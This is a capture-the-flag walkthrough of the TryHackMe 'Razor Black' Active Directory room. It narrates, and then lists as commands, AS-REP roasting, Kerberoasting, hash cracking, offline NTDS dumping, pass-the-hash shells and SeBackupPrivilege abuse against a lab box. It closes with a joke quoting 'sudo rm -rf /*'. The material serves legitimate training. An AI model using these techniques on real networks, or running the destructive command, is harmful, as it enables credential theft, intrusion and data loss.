Introduction
In this walkthrough, we covered Active Directory penetration testing and Privilege Escalation through techniques such as ASREProsting and Kerebroasting.
These guys call themselves hackers. Can you show them who’s the boss ??
Throw something like a rock on the big green thingy on the right side here to deploy your box.
The box has ICMP enabled. So, look at ping first before starting recon and stop slapping `-Pn` on nmap.
This room is proudly made by: Xyan1d3
Recon and Initial Foothold
I started with a basic Nmap scan to see what ports were open. I found services like Kerberos, LDAP, and an NFS file share. I mounted the NFS share and found an Excel file with employee names and the first flag.
Using the employee list, I created a user list for Active Directory and performed AS-REP roasting to get a user hash. I cracked the hash with Hashcat and got a password.
With the username and password, I tried to access the SMB shares but was denied access to the “trash” share, which I knew contained a zip file. I used Metasploit to find other valid users and discovered that another user had the same password. This time, I was able to access the share and download the zip file. I then used zip2john and John the Ripper to crack the zip file’s password.
Hash Extraction and Privilege Escalation
Inside the zip file, I found a database of hashes. I used secretsdump.py in offline mode to extract hashes from the system.hive
and ntds.dit
files. I then used the cut
command to separate the usernames and hashes into different files.
I used CrackMapExec to find the hash for a specific user, “alvitrova,” and then used that hash with evil-winrm to get a shell on the system. I found an XML file with an encoded string, which I decoded using a PowerShell command to get the flag.
I then used getuserSPNs.py to get the service principal name for another user, “zn,” and cracked the resulting hash to get their password. I got a shell as “zn” and found another encoded flag in an XML file.
To get root, I used the whoami /all
command and found that the “zn” user had the SeBackupPrivilege. I exploited this by creating a diskshadow
script to back up the ntds.dit
and system.hive
files. I downloaded these files to my machine and used secretsdump.py
again to get the administrator hash.
Root and Final Secrets 🚩
With the administrator hash, I used evil-winrm to get a root shell. I found the root.xml
file, which contained an encoded password that I decoded to get the root flag.
I also found a flag for the user “tyson” in a text file in their user directory.
For the final secret, I navigated to the “Top Secret” directory in “Program Files” and found an image file. The image contained a message about exiting vim
, leading me to the final secret: :wq.
Technical Commands Used
Here are the technical commands I used in the terminal during the demonstration:
Nmap and NFS
sudo nmap -sV [IP address]
nmap -p [port] [IP address]
showmount -e [IP address]
sudo mount -t nfs -o vers=3 [IP address]:/users /home/user/users_thm
File and Hash Operations
python3 getNPUsers.py -dc-ip [IP address] -usersfile users_rz.txt -format hashcat -outputfile asrep_hash.txt
hashcat -m 18200 asrep_hash.txt [wordlist]
zip2john [zip_file] > [output_hash_file]
john --wordlist=[wordlist] [hash_file]
python3 secretsdump.py -system [system_file] -ntds [ntds_database] local -outputfile hashes_v1.txt
cut -d':' -f1 hashes_v1.txt > users_v2.txt
cut -d':' -f4 hashes_v1.txt > hashes_v2.txt
SMB and Metasploit
smbmap -u [username] -p [password] -H [IP address]
use auxiliary/scanner/smb/smb_enumusers
smbclient //[IP address]/[share_name] -U [username]%[password]
Shells and Privilege Escalation
crackmapexec smb [IP address] -u [username] -H [hash_file]
evil-winrm -i [IP address] -u [username] -H [hash]
$credential = Import-CliXml -Path "[path_to_xml_file]"
$credential.GetNetworkCredential().Password
python3 getuserSPNs.py -dc-ip [IP address] [domain]/[username]:[hash] -request -outputfile zn_hash_v2.txt
whoami /all
diskshadow.exe /s diskshadow.txt
Import-Module [dll_file]
Copy-FileBackupPrivilege -Source "[source_path]" -Destination "[destination_path]"
Video Walk-through
TryHackMe Razor Black Room Answers
What is the zip file’s password?
What is Ljudmila’s Flag?
What is Xyan1d3’s password?
What is Xyan1d3’s Flag?
What is the root Flag?
What is Tyson’s Flag?
What is the complete top secret?
Did you like your cookie?
Say Yes or I will do sudo rm -rf /*
on your PC